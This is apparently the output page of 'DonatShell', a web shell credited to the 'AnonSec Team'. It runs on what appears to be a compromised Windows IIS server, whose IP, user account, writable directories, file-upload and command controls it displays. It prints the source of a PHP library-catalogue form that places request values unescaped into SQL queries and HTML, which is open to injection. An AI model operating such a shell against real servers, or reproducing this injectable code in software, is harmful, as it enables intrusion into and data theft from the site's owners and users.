DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.25
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/AppServ/www/umedia3/login.metadata/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/AppServ/www/umedia3/login.metadata/addDBbook.php
<?php
	; 
        include ("../inc/config.inc.php");
		head();
		$_REQPERM="metadata-cancreate";
        mn_lib();
//printr($_SESSION);
		function getdatfield($mid,$tb,$fid ) {
			$s="select * from $tb where mid='$mid' ";
			$s=tmq($s);
			echo mysql_error();
			$s=mysql_fetch_array($s);
			return $s[$fid];
		}

		$oldval=tmq("select * from media where randid='$load' ");
		$oldval=tmq_fetch_array($oldval);
		if ($oldval[LIBSITE]=="") {
			$oldval[LIBSITE]=$LIBSITE;
		}
?>
<img src='../neoimg/cal.gif' width=1 style="display:none">
<img src='../neoimg/plus.gif' width=1 style="display:none">
<img src='../neoimg/minus.gif' width=1 style="display:none">
<SCRIPT LANGUAGE="JavaScript" src="../js/datetimepicker.js">
            </SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
            <!--
			function dateup(wh) {
				//alert(wh);
				tmp=getobj(wh);
				tmps=tmp.value+'';
				tmp1=tmps.substring(0,4);
				tmp2=tmps.substring(4,40);
				//alert(tmp2);
				tmp.value=(Math.floor(tmp1)+543)+tmp2
			}
			function datedown(wh) {
				//alert(wh);
				tmp=getobj(wh);
				tmps=tmp.value+'';
				tmp1=tmps.substring(0,4);
				tmp2=tmps.substring(4,40);
				//alert(tmp2);
				tmp.value=(Math.floor(tmp1)-543)+tmp2
			}
            function addhtml(wh,str) {
				ridno="a"+Math.floor(Math.random()*10000000)+"";
				rid="\"a"+ridno+"\"";
				<?for ($i=1;$i<=30;$i++) { ?>
					str=str.replace("randomnoquote",ridno);
					str=str.replace("randomhere",rid);
					str=str.replace("THEDATAOFf<?echo $i?>","");
				<? } ?>
				//str=str.replace("randomhere",rid);
				wh.innerHTML=wh.innerHTML+str
				}
				function remov(wh) {
					//eval("document.all."+wh+".innerHTML='';");
					//alert(document.all[wh].innerHTML);
					document.all[wh].innerHTML=''
				}
            //-->
            </SCRIPT>
<BR>
<form name = "form1" method = "post" action = "addnewDBbook.php" enctype="multipart/form-data">
<table width = 780 align = center border = 0 cellpadding =2 cellspacing = 0 class=table_border>
<tr  class=table_head>
	<td valign = "middle" colspan=3 style="text-align: left;" ><nobr><B>&nbsp;<?echo  getlang("หมวดหมู่::l::Category");?></B></td>
</tr>
<tr  class=table_td>
	<td valign = "middle" colspan=2 style="text-align: left; padding-left: 215" ><nobr><B>&nbsp;</B>
	<? frm_metadatacate("selectthiscate",$oldval[cate]);?>
<?
	echo "<INPUT TYPE=hidden NAME='setlibsite' value='$LIBSITE'>";
	echo "<INPUT TYPE=hidden NAME='webpageshowcaseall' value='$oldval[webpageshowcaseall]'>";
?><BR>
&nbsp; จำนวนผู้ชม <INPUT TYPE="text" NAME="viewcount" value="<? echo $oldval[viewcount];?>">
	</td>
</tr>
<?
	$sql82="select * from dcdir order by ismain desc, ordr";
	$result=tmq($sql82);
	$firstnotmain="yes";
	while ($row=mysql_fetch_array($result)) {
		if ($row[ismain]=="no" && $firstnotmain=="yes") {
			$firstnotmain="no";
			?>
			</table>
<SCRIPT LANGUAGE="JavaScript">
<!--
	function swapmenu(wh) {
		tmp=getobj(wh);
		if (tmp.style.display=='block') {
			tmp.style.display='none'
		} else {
			tmp.style.display='block'
		}
	}
//-->
</SCRIPT>			<A HREF="javascript:void(0)" onclick="swapmenu('divnotismain')"><CENTER>กรอกข้อมูลเพิ่มเติม</CENTER></A>
			<div ID="divnotismain" style="display:none">
			<table width = 780 align = center border = 0 cellpadding =2 cellspacing = 0 class=table_border style="border-color: 777777;border-width:4;">
<?
		}
		$arrid="a$row[id]";
		$addhtml="";

		if ($row[ismain]=="yes") {
			$addhtml="*";
		}
?>
<tr  class=table_head>
	<td valign = "middle" colspan=2 style="text-align: left;" ><nobr><B>&nbsp;<?echo  $row[name]?></B></td>
	<td valign = "middle" colspan=1 align=right ><span ID="ADDBTN<? echo $row[id]?>"></span></td>
</tr>
<tr bgcolor = "#ffffff">
<td valign = "middle" colspan=3 class=table_td>
<?
$s="select * from dcdir_sub where pid='$row[id]' order by ordr";
$r=tmq($s);
	$str="<INPUT TYPE=hidden name='data[randomhere][did]' value='$row[tbname]'>";
	$str="$str<table border=0 width=700 cellpadding=0 cellspacing=0> ";
while ($r2=mysql_fetch_array($r)) {
	$str="$str<TR><td width=220>&nbsp;&nbsp;&nbsp;&nbsp;$r2[name] $Xval</td>";
	$str="$str<td>";
	if ($r2[datatype]=="list") {
		$str="$str \n<select name='data[randomhere][$r2[fid]]'' >";
		if ($load!="") {
			$str="$str \n<option selected>THEDATAOF$r2[fid]";
		}
		$t1=split(",",$r2[datalist]);
		foreach ($t1 as $t2) {
			$t3=split(":",$t2);
			if ($t3[1]=="") {
				$t3[1]=$t3[0];
				$str="$str <option value='$t3[0]'> $t3[1]\n";
			} else {
				$str="$str <option value='$t3[0]'> [$t3[0]] $t3[1]\n";
			}
		}
		$str="$str </select>\n";
	}
	if ($r2[datatype]=="text") {
		$str="$str\n <INPUT TYPE=text NAME='data[randomhere][$r2[fid]]' size=55 value='THEDATAOF$r2[fid]'>\n";
	}
	if ($r2[datatype]=="date") {
		$tmp=rand(0,10000);
		$str="$str\n <INPUT TYPE=text NAME='data[randomhere][$r2[fid]]' size=55
		ID='tag$tmp"."randomnoquote' value='THEDATAOF$r2[fid]'> <a href=javascript:void(0) onclick=NewCal('tag$tmp"."randomnoquote','ddmmyyyy')><img src=../neoimg/cal.gif width=16 height=16 border=0 alt='Pick a date' align=absmiddle></a>
		<img src=../neoimg/Up.gif align=absmiddle border=0 onclick=dateup('tag$tmp"."randomnoquote')>
		<img src=../neoimg/Down.gif align=absmiddle border=0 onclick=datedown('tag$tmp"."randomnoquote')>
\n";

	}
	if ($r2[datatype]=="llpicker") {
		$lltmp=randid();
		$str="$str\n <INPUT TYPE=text NAME='data[randomhere][$r2[fid]]' size=35
		ID='tag$lltmp"."randomnoquote' value='THEDATAOF$r2[fid]'> <a 
		nhref='http://code.google.com/apis/maps/documentation/javascript/v2/examples/marker-drag.html' 
		href='$dcrURL"."_gmappicker.php?id=tag$lltmp&defplace=THEDATAOF$r2[fid]' style='color:#173960;font-size: 12;'  rel='gb_page_fs[]'>เลือก</a>
\n";

	}
	if ($r2[datatype]=="longtext") {
		$str="$str\n <TEXTAREA NAME='data[randomhere][$r2[fid]]' ROWS=9 COLS=60>THEDATAOF$r2[fid]</TEXTAREA>\n";
	}
	if ($load=="") {
		$r2[defval]=str_replace('[AUTO-DATE]',date("Y-m-d"),$r2[defval]);
		$str=str_replace("THEDATAOF$r2[fid]",$r2[defval],$str);
	}
	$str="$str$addhtml</td></tr>";
	//printr($r2);
}
	$str="$str</table>";
	$echoingstr= str_replace('randomhere',$arrid,"$str");
	for ($i=0;$i<=15;$i++) {
		$echoingstr=str_replace("THEDATAOFf$i","",$echoingstr);
	}
	if ($load=="") {
		echo $echoingstr;
	}
	//printr($row);

$str="<span id=randomhere><TABLE cellpadding=0 cellspacing=1 bgcolor=f0f0f0 width=600>
<TR bgcolor=ffffff valign=top>
	<TD colspan=2>$str</TD>
	<TD width=50><A HREF='#' onclick='remov(randomhere); return false;' >Remove</A></TD>
</TR>
</TABLE></span>";
$str=stripslashes($str);
$str=stripslashes($str);
$str=stripslashes($str);
$str=stripslashes($str);
$str=stripslashes($str);
$str=stripslashes($str);
$str=addslashes($str);
$str=str_replace("
"," ",$str);
$str=str_replace("\n"," ",$str);
$str=str_replace($newline," ",$str);

	if ($row[iscandup]=='yes') {
		?>
		<SCRIPT LANGUAGE="JavaScript">
		<!--
		document.all['ADDBTN<? echo $row[id]?>'].innerHTML='<A HREF=\"javascript:void(null)\" onmousedown=\"addhtml(document.all.adder<? echo $row[id]?>,\'<?echo addslashes($str);?>\')\"><IMG SRC="../neoimg/plus.gif" WIDTH="16" HEIGHT="16" BORDER="0" ALT="" align=absmiddle>  add</A>';
		//-->
		</SCRIPT>
		<?
	}

	if ($load!="") {
		$Xsql="select * from $row[tbname] where mid='$load' ";
		$X=tmq($Xsql);
		while ($x2=mysql_fetch_array($X)) {
			$editrand="\"a".rand(0,1000000000)."\"";
			$xstr=str_replace("randomhere",$editrand,$str);
			$xstr=str_replace("\\'","'",$xstr);
			$allxval="";
			for ($i=0;$i<=15;$i++) {
				$allxval=$allxval.$x2["f$i"];
				$xstr=str_replace("THEDATAOFf$i",$x2["f$i"],$xstr);
			}
			if ($allxval!="" || $row[iscandup]!='yes') {
				if ($row[iscandup]!='yes' && $load!="") {
					$xstr=str_replace("Remove",'',$xstr);
				}
				echo $xstr;
			}
		}
	} 

	?><span id="adder<? echo $row[id]?>"></span><?
?>
</td>
</tr>

<?
}// end while dcdir
?>
			</table>
			<A HREF="javascript:void(0)" onclick="swapmenu('divnotismain')"><CENTER>ซ่อนช่องกรอกข้อมูลเพิ่มเติม</CENTER></A></div> <!-- not ismain div -->
			<table width = 780 align = center border = 0 cellpadding =2 cellspacing = 0 class=table_border>

<tr bgcolor=white>
<td colspan = 3 align = center>

<? echo getlang("เสร็จแล้วไปที่::l::After saved go to"); 
$lastbringmeto=sessionval_get("addbook-bringmeto");
?> : 
	<LABEL><INPUT TYPE="radio" NAME="bringmeto" style="border-width:0" value="" <? if ($lastbringmeto=="" && $chainid=='') { echo "checked";}?>> 
	<? echo getlang("รายการ::l::Database"); ?></LABEL>  - 

	<LABEL><INPUT TYPE="radio" NAME="bringmeto" style="border-width:0" value="addnewrecord" <? if ($lastbringmeto=="addnewrecord") { echo "checked";}?>>
	<? echo getlang("เพิ่มรายการใหม่::l::Add another record"); ?></LABEL>  - 

	<LABEL><INPUT TYPE="radio" NAME="bringmeto" value="uploadto"style="border-width:0"  <? if ($lastbringmeto=="uploadto") { echo "checked";}?>>
	<? echo getlang("อัพโหลดไฟล์แนบ::l::Upload"); ?></LABEL><BR><BR>
<input type = "submit" value = "Submit">&nbsp;<input type = "reset" value = "Reset"> <b><a href = "index.php" class=a_btn><B><? echo getlang("กลับ::l::Back");?></B></a>
 

</td></tr>

                    </table>
<?
if ($load!="")	 {
	echo "<INPUT TYPE=hidden name=todelete value='$load'>";
}
?><INPUT TYPE="hidden" NAME="filenamedisplay" value="<? echo $oldval[filenamedisplay]?>">
                                </form>
<SCRIPT LANGUAGE="JavaScript">
<!--
	function setlltext(txt) {
		tmp=getobj('tag<? echo $lltmp?>randomnoquote');
		tmp.value=txt;
	}
//-->
</SCRIPT>
<?
	foot();
?>

Anon7 - 2022
AnonSec Team